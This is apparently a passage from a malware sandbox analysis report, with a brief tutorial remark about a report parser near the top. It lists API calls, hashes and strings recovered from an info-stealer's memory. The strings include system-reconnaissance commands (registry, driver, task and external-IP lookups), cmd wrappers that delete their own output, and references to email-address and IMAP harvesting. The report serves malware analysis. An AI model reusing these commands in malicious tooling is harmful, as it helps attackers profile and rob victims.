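• LoadLibraryA.KERNEL32(NTDSAPI.DLL), ref: 00450BC7
• FreeLibrary.KERNEL32(00000000), ref: 00450BD2
• String ID: NTDLL.DLL$NTDSAPI.DLL
APIs
• GetVersion.KERNEL32(0046E220,0045D680), ref: 0045903C
• GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrRegisterDllNotification), ref: 00459050
• GetProcAddress.KERNEL32(00000000), ref: 00459057
• String ID: LdrRegisterDllNotification$NTDLL.DLL
APIs
• lstrlen.KERNEL32(00000000,00000000,00000000,00446D43,reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >,00000000,?,driverquery.exe >,00000000,?,tasklist.exe /SVC >,00000000,?,nslookup 127.0.0.1 >,00000000), ref: 004621A8
• RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 004621BD
• wsprintfA.USER32 ref: 004621D2
  • Part of subcall function 0045E99C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 0045EA25
• HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 004621EE
"""
```

Running summarize(SAMPLE) on the excerpt yields three entries; the second carries only the DLL-notification flag and the third carries both the cmd.exe and the reconnaissance flags, with the CreateProcessA call attributed to subcall 0045E99C rather than to the outer function. The same parser can be pointed at the full exported report to list every block that touches an indicator, which is faster than scrolling the listing by hand.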

APIs
• lstrlen.KERNEL32(00000000,00000000,00000000,00446D43,reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >,00000000,?,driverquery.exe >,00000000,?,tasklist.exe /SVC >,00000000,?,nslookup 127.0.0.1 >,00000000), ref: 004621A8
• RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 004621BD
• wsprintfA.USER32 ref: 004621D2
  • Part of subcall function 0045E99C: memset.NTDLL ref: 0045E9B1
  • Part of subcall function 0045E99C: lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 0045E9EA
  • Part of subcall function 0045E99C: wcstombs.NTDLL ref: 0045E9F4
  • Part of subcall function 0045E99C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 0045EA25
  • Part of subcall function 0045E99C: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,*<F), ref: 0045EA51
  • Part of subcall function 0045E99C: TerminateProcess.KERNEL32(?,000003E5), ref: 0045EA67
  • Part of subcall function 0045E99C: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 0045EA7B
  • Part of subcall function 0045E99C: CloseHandle.KERNEL32(?), ref: 0045EAAE
  • Part of subcall function 0045E99C: CloseHandle.KERNEL32(?), ref: 0045EAB3
• HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 004621EE
Strings
                                                                                                                                        • cmd /U /C "type %s1 > %s & del %s1", xrefs: 004621CC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                                                                                                                                        • String ID: cmd /U /C "type %s1 > %s & del %s1"
                                                                                                                                        • API String ID: 1624158581-4158521270
                                                                                                                                        • Opcode ID: 25fd3b7efc183272f3605a2122a27218f6e606fcf0c986446b2b17d43b92fc22
                                                                                                                                        • Instruction ID: 03a0845c153fb52b790f4360f384b879f83d4191b4ddf336620eab02796bfa14
                                                                                                                                        • Opcode Fuzzy Hash: 25fd3b7efc183272f3605a2122a27218f6e606fcf0c986446b2b17d43b92fc22
                                                                                                                                        • Instruction Fuzzy Hash: FBF0A731A4455177D121272ABC0DF5B7F6CEBC2B61F150236F915E12E1FEA48C0A85AF
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(03BD8D20), ref: 00463540
                                                                                                                                        • Sleep.KERNEL32(0000000A,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0046354A
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 00463578
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(03BD8D20), ref: 0046358D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                        • String ID: 0123456789ABCDEF
                                                                                                                                        • API String ID: 58946197-2554083253
                                                                                                                                        • Opcode ID: 60895cc953b16be230fa779e24dda39c6e895ef34470fcc5311a618c47e99df3
                                                                                                                                        • Instruction ID: d4ac8c6bbaedc90b80be7e53d29fd7bad5610c426e712be0a823b8335f4ba292
                                                                                                                                        • Opcode Fuzzy Hash: 60895cc953b16be230fa779e24dda39c6e895ef34470fcc5311a618c47e99df3
                                                                                                                                        • Instruction Fuzzy Hash: 25F0FE78200241EFE7088F15DD49B9637A4AB15701B05452AF907D7360FBB4EE41DA1F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,00000008), ref: 004488B6
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                          • Part of subcall function 00465284: lstrlenW.KERNEL32(00000000,00000000,00000000,?,00000000,004658DA,00000000), ref: 00465295
                                                                                                                                          • Part of subcall function 00465284: lstrlenW.KERNEL32(0046A4C8,00000000,?,00000000,004658DA,00000000), ref: 004652AC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$AllocateErrorHeapLast
                                                                                                                                        • String ID: 1.0$A8000A$EmailAddressCollection/EmailAddress[%u]/Address$_iF
                                                                                                                                        • API String ID: 3415590935-3983310155
                                                                                                                                        • Opcode ID: 59343cc6d1cb7d9a8f267060fd18ad864a2a6d6c7ab643072ec9bb518e11efa7
                                                                                                                                        • Instruction ID: 8788be38bfb4d6c89e01186bd36794b6267f1507db268700e46704fa62c9af70
                                                                                                                                        • Opcode Fuzzy Hash: 59343cc6d1cb7d9a8f267060fd18ad864a2a6d6c7ab643072ec9bb518e11efa7
                                                                                                                                        • Instruction Fuzzy Hash: E9411D74A00205AFDB10EFA5C888EAEB7B8EF84705B244459F905EB351DB79EE01CB64
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044AD37: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 0044AD43
                                                                                                                                          • Part of subcall function 0044AD37: SetLastError.KERNEL32(000000B7,?,004630F1,?,?,00000000,?,?,?), ref: 0044AD54
                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 00463111
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 004631E9
                                                                                                                                          • Part of subcall function 0044AA04: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0044AA1E
                                                                                                                                          • Part of subcall function 0044AA04: CreateWaitableTimerA.KERNEL32(0046E0F8,?,?), ref: 0044AA3B
                                                                                                                                          • Part of subcall function 0044AA04: GetLastError.KERNEL32(?,?), ref: 0044AA4C
                                                                                                                                          • Part of subcall function 0044AA04: GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 0044AA8C
                                                                                                                                          • Part of subcall function 0044AA04: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 0044AAAB
                                                                                                                                          • Part of subcall function 0044AA04: HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 0044AAC1
                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,?), ref: 004631D2
                                                                                                                                        • ReleaseMutex.KERNEL32(00000000,?,00000000,?,?,?), ref: 004631DB
                                                                                                                                          • Part of subcall function 0044AD37: CreateMutexA.KERNEL32(0046E0F8,00000000,?,?,004630F1,?,?,00000000,?,?,?), ref: 0044AD67
                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 004631F6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1700416623-0
                                                                                                                                        • Opcode ID: 4c1352b90ea944946278ab71e5ef7dc79cfc17efa38ac15c943838d8eb2c880a
                                                                                                                                        • Instruction ID: 438e2386f9eeb5ff5e65d4021dc7aa890b5ca28d8d75fd553950e54ea912ee88
                                                                                                                                        • Opcode Fuzzy Hash: 4c1352b90ea944946278ab71e5ef7dc79cfc17efa38ac15c943838d8eb2c880a
                                                                                                                                        • Instruction Fuzzy Hash: EB3190B5F002449FCB109F65DC448AA7BBAFB8A305710443BE812D7361FAB89D11CB2A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • RtlImageNtHeader.NTDLL(00000000), ref: 00461AFF
                                                                                                                                          • Part of subcall function 004649E9: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,0044EDBE), ref: 00464A0F
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,?,00000000,004561AA,00000000), ref: 00461B41
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 00461B93
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,004561AA,00000000), ref: 00461BAC
                                                                                                                                          • Part of subcall function 00442DED: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00442E0E
                                                                                                                                          • Part of subcall function 00442DED: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,00000000), ref: 00442E51
                                                                                                                                        • GetLastError.KERNEL32(?,00000000,004561AA,00000000), ref: 00461BE4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1921436656-0
                                                                                                                                        • Opcode ID: 043a61e4c3d103128f4c9679beec697009e55ad19a772b8e820b246b40d00d45
                                                                                                                                        • Instruction ID: d84bf5bbbeb65a40574a0c0945bb5132370900706ecb774db8ce5770b7dda8a2
                                                                                                                                        • Opcode Fuzzy Hash: 043a61e4c3d103128f4c9679beec697009e55ad19a772b8e820b246b40d00d45
                                                                                                                                        • Instruction Fuzzy Hash: 75316071A00204AFDF11DFA5CD80AAE7BB4EF04B50F14406AE905EB261F774AE41CB9A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0045374D: lstrlen.KERNEL32(00000000,?,00000F00), ref: 00453771
                                                                                                                                          • Part of subcall function 0045374D: StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,000000FF,?,00000F00), ref: 004537FD
                                                                                                                                          • Part of subcall function 0045374D: HeapFree.KERNEL32(00000000,?,000000FF,?,00000F00), ref: 0045381A
                                                                                                                                          • Part of subcall function 0045374D: DeleteFileA.KERNEL32(00000000,00000000,?,?,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 00453822
                                                                                                                                          • Part of subcall function 0045374D: HeapFree.KERNEL32(00000000,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 00453831
                                                                                                                                        • StrChrA.SHLWAPI(?,0000003A,00000000,00000000), ref: 004430B3
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 004430C7
                                                                                                                                        • StrTrimA.SHLWAPI(?,0A0D0920,?,?,00000000), ref: 004430FB
                                                                                                                                        • lstrlen.KERNEL32(?), ref: 00443104
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 0044311E
                                                                                                                                          • Part of subcall function 00447C1B: memset.NTDLL ref: 00447C4A
                                                                                                                                          • Part of subcall function 00447C1B: lstrlen.KERNEL32(?), ref: 00447C5A
                                                                                                                                          • Part of subcall function 00447C1B: strcpy.NTDLL ref: 00447C71
                                                                                                                                          • Part of subcall function 00447C1B: StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 00447C7B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap$lstrlen$Trim$DeleteFilememsetstrcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1047761332-0
                                                                                                                                        • Opcode ID: 40875e4ec61c9f8168524d6df98cef7cd71d028207211de181f18a86a24b0240
                                                                                                                                        • Instruction ID: f3facb250764925212248d98bc4db58c1bf7df28d6dfbcb260db7aae1cbd85c5
                                                                                                                                        • Opcode Fuzzy Hash: 40875e4ec61c9f8168524d6df98cef7cd71d028207211de181f18a86a24b0240
                                                                                                                                        • Instruction Fuzzy Hash: F431B771A00005ABEF349FD4DC849BEB7A5DF00B46F2401BBE101E26A5DB7C4F889A5B
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,74B05520,?,?,00458DD3,00000000,?,?), ref: 004549B7
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,00458DD3,00000000,?,?,?,?,00000000,004414AA,?,00000000,?,00464A70), ref: 004549C7
                                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,00458DD3,00000000,?,?,?,?,00000000,004414AA), ref: 004549F3
                                                                                                                                        • GetLastError.KERNEL32(?,?,00458DD3,00000000,?,?,?,?,00000000,004414AA,?,00000000,?,00464A70,?,00000001), ref: 00454A18
                                                                                                                                        • CloseHandle.KERNEL32(000000FF,?,?,00458DD3,00000000,?,?,?,?,00000000,004414AA,?,00000000,?,00464A70,?), ref: 00454A29
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseCreateErrorHandleLastReadSize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3577853679-0
                                                                                                                                        • Opcode ID: f2514433567aac5191ab1838728be766165d05f443725af42785416e664d9056
                                                                                                                                        • Instruction ID: 160078190dce67aec855d61db9cf0d9b2d826e17651fbf9e0e548767a7c8b14b
                                                                                                                                        • Opcode Fuzzy Hash: f2514433567aac5191ab1838728be766165d05f443725af42785416e664d9056
                                                                                                                                        • Instruction Fuzzy Hash: 78118C72140204FFCB205F64DC84EAF7B5CEB8035AF01462BFD05AB241D6749C8887AD
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

APIs
• StrChrA.SHLWAPI(?,0000002C), ref: 00453644
• StrRChrA.SHLWAPI(?,00000000,0000002F), ref: 0045365D
• StrTrimA.SHLWAPI(?,20000920), ref: 00453685
• StrTrimA.SHLWAPI(00000000,20000920), ref: 00453694
• HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 004536CB
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Trim$FreeHeap
• String ID:
• API String ID: 2132463267-0
• Opcode ID: fa3d78fc6f7e706fb167c788d572697ea1c903ad77becbaa4cde6bfbafa6de07
• Instruction ID: ebcb93cb85af361b935b27c40ffc763ccbcf04aa56219d729ab1ff9056c8a9ec
• Opcode Fuzzy Hash: fa3d78fc6f7e706fb167c788d572697ea1c903ad77becbaa4cde6bfbafa6de07
• Instruction Fuzzy Hash: 04118476600209BBD7219B59DC85F977BACDB44792F100026FD098B351EBF4ED48C759
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 004606E6
  • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00453762,00000F00), ref: 004606FF
  • Part of subcall function 004606D4: GetCurrentThreadId.KERNEL32 ref: 0046070C
  • Part of subcall function 004606D4: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00453762,00000F00), ref: 00460718
  • Part of subcall function 004606D4: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 00460726
  • Part of subcall function 004606D4: lstrcpy.KERNEL32(00000000), ref: 00460748
• StrChrA.SHLWAPI(?,0000002C,00003219), ref: 00448FB9
• StrTrimA.SHLWAPI(?,20000920), ref: 00448FD6
• DeleteFileA.KERNEL32(00000000,00003219), ref: 00449013
• HeapFree.KERNEL32(00000000,00000000), ref: 00449022
• HeapFree.KERNEL32(00000000,?,00003219), ref: 00449034
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: FileTemp$FreeHeapPathTime$CurrentDeleteNameSystemThreadTrimlstrcpy
• String ID:
• API String ID: 2468597211-0
• Opcode ID: 610b9d91030d51b553c50982c2a826e6c33e1acd67306c1d52668fff1086a606
• Instruction ID: f57a519fae2f6e31110d8132d428c981b9f62d8208c9ed9878f8d8b54773bbe8
• Opcode Fuzzy Hash: 610b9d91030d51b553c50982c2a826e6c33e1acd67306c1d52668fff1086a606
• Instruction Fuzzy Hash: 6E1101317042096BF3226B699C45F5B7B9CAF55705F01043AFA05962A2EAE95C48932E
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 0045E798
• GetLastError.KERNEL32 ref: 0045E7BB
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045E7CE
• GetLastError.KERNEL32 ref: 0045E7D9
• HeapFree.KERNEL32(00000000,00000000), ref: 0045E821
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
• String ID:
• API String ID: 1671499436-0
• Opcode ID: f39004b02af6cc1ed85a9a304b71f1f8520bf04ff1afdc4df7ae25daedac1998
• Instruction ID: 44ee8b708b9a41becdb8973e1f84a4649e493e7ae6c4ed88edb7c909f6dbd415
• Opcode Fuzzy Hash: f39004b02af6cc1ed85a9a304b71f1f8520bf04ff1afdc4df7ae25daedac1998
• Instruction Fuzzy Hash: 3221F970500240EBE7289F52DD8CB5F7BB8FB00316F600569F502921E1D7B99E89DB1A
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetSystemTimeAsFileTime.KERNEL32(00457D8C,?,?,?,?,00000008,00457D8C,00000000,?), ref: 0045604C
• memcpy.NTDLL(00457D8C,?,00000009,?,?,?,?,00000008,00457D8C,00000000,?), ref: 0045606E
• RtlAllocateHeap.NTDLL(00000000,00000013), ref: 00456086
• lstrlenW.KERNEL32(00000000,00000001,00457D8C,?,?,?,?,?,?,?,00000008,00457D8C,00000000,?), ref: 004560A6
• HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000008,00457D8C,00000000,?), ref: 004560CB
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
• String ID:
• API String ID: 3065863707-0
• Opcode ID: 5b45895b010c633fe104ebf4434ddd15f2049dc9ba75a24d1b2c9e4e16472800
• Instruction ID: 715580f35bd3d713d4ed4994b34d0d92856462aa3e06987c39046d4be122f0e9
• Opcode Fuzzy Hash: 5b45895b010c633fe104ebf4434ddd15f2049dc9ba75a24d1b2c9e4e16472800
• Instruction Fuzzy Hash: E311D675E00208BBCB109BA5DC49F8E7BB8DB08711F018065FA09D7291EA74D64CCB5A
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32 ref: 00459232
• GetModuleHandleA.KERNEL32 ref: 00459240
• LoadLibraryExW.KERNEL32(?,?,?), ref: 0045924D
• GetModuleHandleA.KERNEL32 ref: 00459264
• GetModuleHandleA.KERNEL32 ref: 00459270
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: HandleModule$LibraryLoad
• String ID:
• API String ID: 1178273743-0
• Opcode ID: 26146c1b5706b87129acd81b08b13dfeaecd649d29bba15c487d7f3c1caba723
• Instruction ID: 42428828ea58b5993506035ce0ee4f20f786feea5bcdbf3478d982088431737d
• Opcode Fuzzy Hash: 26146c1b5706b87129acd81b08b13dfeaecd649d29bba15c487d7f3c1caba723
• Instruction Fuzzy Hash: EC018F31B00206AB9F015F7ADC409567BA9FF14361704443BFD14C2222EBB29C158B99
Uniqueness
Uniqueness Score: -1.00%

APIs
• StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,00459582), ref: 0045B19E
• StrTrimA.SHLWAPI(00000001,0A0D0920,?,00459582), ref: 0045B1C1
• StrTrimA.SHLWAPI(00000000,0A0D0920,?,00459582), ref: 0045B1D0
• _strupr.NTDLL ref: 0045B1D3
• lstrlen.KERNEL32(00000000,00459582), ref: 0045B1DB
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Trim$_struprlstrlen
• String ID:
• API String ID: 2280331511-0
• Opcode ID: 607093f98b83392360747fcb77d0af7a820fbd5e9c5f091244ac180580ff8892
• Instruction ID: f78441c85a4e027f7d02fb7bda06c5cedf3316addf6ec617248cdb9fa6a745c1
• Opcode Fuzzy Hash: 607093f98b83392360747fcb77d0af7a820fbd5e9c5f091244ac180580ff8892
• Instruction Fuzzy Hash: 8CF0AF71602111AFE3159B26AC89F3B37A8EB49A51B000069F405C7291EBE49C06876A
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlEnterCriticalSection.NTDLL(0046E240), ref: 00453B4A
• RtlLeaveCriticalSection.NTDLL(0046E240), ref: 00453B5B
• VirtualProtect.KERNEL32(?,00000004,00000040,0000007F,?,?,00462EBB,?,?,0046E268,00444657,00000003), ref: 00453B72
• VirtualProtect.KERNEL32(?,00000004,0000007F,0000007F,?,?,00462EBB,?,?,0046E268,00444657,00000003), ref: 00453B8C
• GetLastError.KERNEL32(?,?,00462EBB,?,?,0046E268,00444657,00000003), ref: 00453B99
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
• String ID:
• API String ID: 653387826-0
• Opcode ID: abf2dda702b40c12007d8551ae89760e7c17a2f11a3cbdc27c1957744e056873
• Instruction ID: cd7befb2dd7c8e505927f2f7f253d3f2289e1730bfa5ea94dad79a0c279113ea
• Opcode Fuzzy Hash: abf2dda702b40c12007d8551ae89760e7c17a2f11a3cbdc27c1957744e056873
• Instruction Fuzzy Hash: C7017CB5200704AFD7209F25CC04E6AB7B9EB85321B114929EA4293261EB70F9068B29
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00442D6E: InterlockedExchange.KERNEL32(?,000000FF), ref: 00442D75
• GetCurrentThreadId.KERNEL32 ref: 0045B7C0
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0045B7D0
• CloseHandle.KERNEL32(00000000), ref: 0045B7D9
• VirtualFree.KERNEL32(000003E8,00000000,00008000,?,00000000,000000FF,000000FF,00447909), ref: 0045B7F7
• VirtualFree.KERNEL32(00002710,00000000,00008000,?,00000000,000000FF,000000FF,00447909), ref: 0045B804
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: FreeVirtual$CloseCurrentExchangeHandleInterlockedObjectSingleThreadWait
• String ID:
• API String ID: 2588964033-0
• Opcode ID: a74f184bf60ae9b7740ff8851edf607e4a366baf4f8723a8004af1c29b5e272b
• Instruction ID: 38a97eecc1bbbfe738124a9586ba77984732b027f28fd35aec40d8cee5661244
• Opcode Fuzzy Hash: a74f184bf60ae9b7740ff8851edf607e4a366baf4f8723a8004af1c29b5e272b
• Instruction Fuzzy Hash: E7F03171500704ABD630AF76DC88F5B73ACFF44351F100A2AF581925A1EB78E848CA69
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(00000000,IMAP,?,00000057,?,004654AE,?,IMAP,Server,00000000,00000000,00000000,?,?,0044B7EA,?), ref: 00450E5A
                                                                                                                                        • lstrlen.KERNEL32(?,?,004654AE,?,IMAP,Server,00000000,00000000,00000000,?,?,0044B7EA,?,00000001,?), ref: 00450E61
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                          • Part of subcall function 0044EB0A: RtlFreeHeap.NTDLL(00000000,00000000,00456D9D,00000000), ref: 0044EB16
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heaplstrlen$AllocateFree
                                                                                                                                        • String ID: %S_%S$IMAP$_iF
                                                                                                                                        • API String ID: 4278773593-2484044307
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,004497D3,?), ref: 0045858C
                                                                                                                                        • GetVersion.KERNEL32 ref: 0045859B
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004585AA
                                                                                                                                        • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 004585C7
                                                                                                                                        • GetLastError.KERNEL32 ref: 004585E6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2270775618-0

                                                                                                                                        APIs
                                                                                                                                        • memcpy.NTDLL(?,HTTP/1.1 404 Not Found,0000001A,?,00000000), ref: 0044AF37
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,?,0046E088,?,?,?,00444EBD), ref: 0044AFA9
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0044AFBA
                                                                                                                                          • Part of subcall function 00453C8D: RtlLeaveCriticalSection.NTDLL(?), ref: 00453D0A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateCriticalFreeLeaveSectionmemcpy
                                                                                                                                        • String ID: HTTP/1.1 404 Not Found
                                                                                                                                        • API String ID: 4231733408-2072751538

                                                                                                                                        APIs
                                                                                                                                        • RtlUpcaseUnicodeString.NTDLL(?,?,00000001), ref: 0044E84C
                                                                                                                                        • RtlFreeAnsiString.NTDLL(?), ref: 0044E8CC
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000), ref: 0044E8D9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: String$AnsiFreeObjectSingleUnicodeUpcaseWait
                                                                                                                                        • String ID: e6"
                                                                                                                                        • API String ID: 2603241602-59706174

                                                                                                                                        APIs
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 00452D7D
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00452D92
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Similarity
